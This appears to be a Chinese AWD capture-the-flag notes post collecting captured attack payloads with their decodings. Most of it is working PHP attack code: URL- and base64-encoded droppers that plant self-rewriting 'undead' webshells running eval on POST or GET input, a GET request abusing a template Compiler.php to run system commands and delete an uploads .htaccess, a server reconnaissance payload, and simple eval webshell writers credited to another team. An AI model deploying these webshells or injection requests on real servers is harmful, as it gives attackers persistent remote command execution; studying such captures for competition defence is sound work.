%24path+%3D+%27%2Fhome%2Fteam%2Fworkdir%2Fskin%2F--ssssss.php%27%3B%24data+%3D+%27PD9waHAKICAgIGlnbm9yZV91c2VyX2Fib3J0KHRydWUpOwogICAgc2V0X3RpbWVfbGltaXQoMCk7CiAgICB3aGlsZSAoMSl7CiAgICAgICAgJHBhdGggPSAiL2hvbWUvdGVhbS93b3JrZGlyL3NraW4vLnNzc3Nzcy5waHAiOwogICAgICAgICRkYXRhID0gIjw%2FcGhwIGlmKG1kNShcJF9QT1NUWydwYXNzJ10pPT0nYzI3MjFkODM2ZGRiNjg2YjBiMDFjYjAwNjYwODk5NTAnKUBldmFsKFwkX1BPU1RbJ2NtZCddKTs%2FPiI7CiAgICAgICAgQGZpbGVfcHV0X2NvbnRlbnRzKCRwYXRoLCAkZGF0YSk7CiAgICAgICAgc3lzdGVtKCdjaG1vZCA1MDAgJy4kcGF0aCk7CiAgICAgICAgdXNsZWVwKDEwMCk7CiAgICB9CiAgICA%2FPg%3D%3D%27%3B%24data%3D+base64_decode%28%24data%29%3B%40file_put_contents%28%24path%2C%24data%29%3Bsystem%28%27chmod+500+%27.%24path%29%3Bsystem%28%27%27rm+%29

// deocde
$path = '/home/team/workdir/skin/--ssssss.php';$data = 'PD9waHAKICAgIGlnbm9yZV91c2VyX2Fib3J0KHRydWUpOwogICAgc2V0X3RpbWVfbGltaXQoMCk7CiAgICB3aGlsZSAoMSl7CiAgICAgICAgJHBhdGggPSAiL2hvbWUvdGVhbS93b3JrZGlyL3NraW4vLnNzc3Nzcy5waHAiOwogICAgICAgICRkYXRhID0gIjw/cGhwIGlmKG1kNShcJF9QT1NUWydwYXNzJ10pPT0nYzI3MjFkODM2ZGRiNjg2YjBiMDFjYjAwNjYwODk5NTAnKUBldmFsKFwkX1BPU1RbJ2NtZCddKTs/PiI7CiAgICAgICAgQGZpbGVfcHV0X2NvbnRlbnRzKCRwYXRoLCAkZGF0YSk7CiAgICAgICAgc3lzdGVtKCdjaG1vZCA1MDAgJy4kcGF0aCk7CiAgICAgICAgdXNsZWVwKDEwMCk7CiAgICB9CiAgICA/Pg==';$data= base64_decode($data);@file_put_contents($path,$data);system('chmod 500 '.$path);system(''rm )

// base64 decode
$path = '/home/team/workdir/skin/--ssssss.php';$data = '<?php
    ignore_user_abort(true);
    set_time_limit(0);
    while (1){
        $path = "/home/team/workdir/skin/.ssssss.php";
        $data = "<?php if(md5(\$_POST['pass'])=='c2721d836ddb686b0b01cb0066089950')@eval(\$_POST['cmd']);?>";
        @file_put_contents($path, $data);
        system('chmod 500 '.$path);
        usleep(100);
    }
    ?>';$data= base64_decode($data);@file_put_contents($path,$data);system('chmod 500 '.$path);system(''rm )

• 删、覆盖上传目录的.htaccess

  GET //libraries/lithium/template/view/Compiler.php?along=system('/bin/echo mo123;rm /home/team/workdir/app/webroot/uploads/.htaccess;/bin/echo xiaoxi456890');

• 还有个没看懂的
  ip：192.168.17.11

  %40ini_set(%22display_errors%22%2C%20%220%22)%3B%40set_time_limit(0)%3Becho%20%22d32d8%22%3B%24D%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3Bif(%24D%3D%3D%22%22)%24D%3Ddirname(%24_SERVER%5B%22PATH_TRANSLATED%22%5D)%3B%24R%3D%22%7B%24D%7D%09%22%3Bif(substr(%24D%2C0%2C1)!%3D%22%2F%22)%7Bforeach(range(%22C%22%2C%22Z%22)as%20%24L)if(is_dir(%22%7B%24L%7D%3A%22))%24R.%3D%22%7B%24L%7D%3A%22%3B%7Delse%7B%24R.%3D%22%2F%22%3B%7D%24R.%3D%22%09%22%3B%24u%3D(function_exists(%22posix_getegid%22))%3F%40posix_getpwuid(%40posix_geteuid())%3A%22%22%3B%24s%3D(%24u)%3F%24u%5B%22name%22%5D%3A%40get_current_user()%3B%24R.%3Dphp_uname()%3B%24R.%3D%22%09%7B%24s%7D%22%3Becho%20%24R%3B%3Becho%20%221d77b%22%3Bdie()%3B
  
  //decode
  @ini_set("display_errors", "0");
  @set_time_limit(0);
  echo "d32d8";
  $D=dirname($_SERVER["SCRIPT_FILENAME"]);
  if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);
  $R="{$D}	";
  if(substr($D,0,1)!="/"){
          foreach(range("C","Z")as$L)
      if(is_dir("{$L}:")
      )$R.="{$L}:";
  }else{$R.="/";}$R.="	";
  $u=(function_exists("posix_getegid"))?@posix_getpwuid(@posix_geteuid()):"";$s=($u)?$u["name"]:@get_current_user();$R.=php_uname();$R.="	{$s}";echo $R;;echo "1d77b";die();

• Nu1l的shell1：
  192.168.21.x

file_put_contents('Nu1ls.php',base64_decode("PD9waHAKCXNldF90aW1lX2xpbWl0KDApOwoJaWdub3JlX3VzZXJfYWJvcnQoMSk7Cgl1bmxpbmsoX19GSUxFX18pOwoJd2hpbGUoMSl7CgkJZmlsZV9wdXRfY29udGVudHMoJy4vLm51MWxjdGZzLnBocCcsICc8P3BocCBAZXZhbCgkX0dFVFsnbnVsbCddKTsnKTsKCQlzeXN0ZW0oJ2NobW9kIDc3NyAuY29uZmlnLnBocCcpOwkJCQkJCgkJLy/mjIHnu63lnKhjb25maWcucGhw5Lit5YaZ5YWlCgkJdG91Y2goIi4vLm51MWxjdGZzLnBocCIsIG1rdGltZSgyMCwxNSwxLDExLDE3LDIwMTcpKTsJCgkJdXNsZWVwKDEwMCk7Cgl9Cj8+Cg=="))


base64解码：
<?php
	set_time_limit(0);
	ignore_user_abort(1);
	unlink(__FILE__);
	while(1){
		file_put_contents('./.nu1lctfs.php', '<?php @eval($_GET['null']);');
		system('chmod 777 .config.php');					
		touch("./.nu1lctfs.php", mktime(20,15,1,11,17,2017));	
		usleep(100);
	}
?>

• Nu1l的shell2：

  file_put_contents%28%22Nu1ls.php%22%2Cbase64_decode%28%22PD9waHAgQGV2YWwoJF9QT1NUWydob21hZWJpYyddKTs%2FPg%3D%3D%22%29%29%3B&zzz=aaa
  
  //decode
  file_put_contents("Nu1ls.php",base64_decode("PD9waHAgQGV2YWwoJF9QT1NUWydob21hZWJpYyddKTs/Pg=="));&zzz=aaa
  
  //file_put_contents("Nu1ls.php",base64_decode("<?php @eval($_POST['homaebic']);?>"));&zzz=aaa

final

最后还有一些骚套路，等考完试写好awd框架了一起分享出来~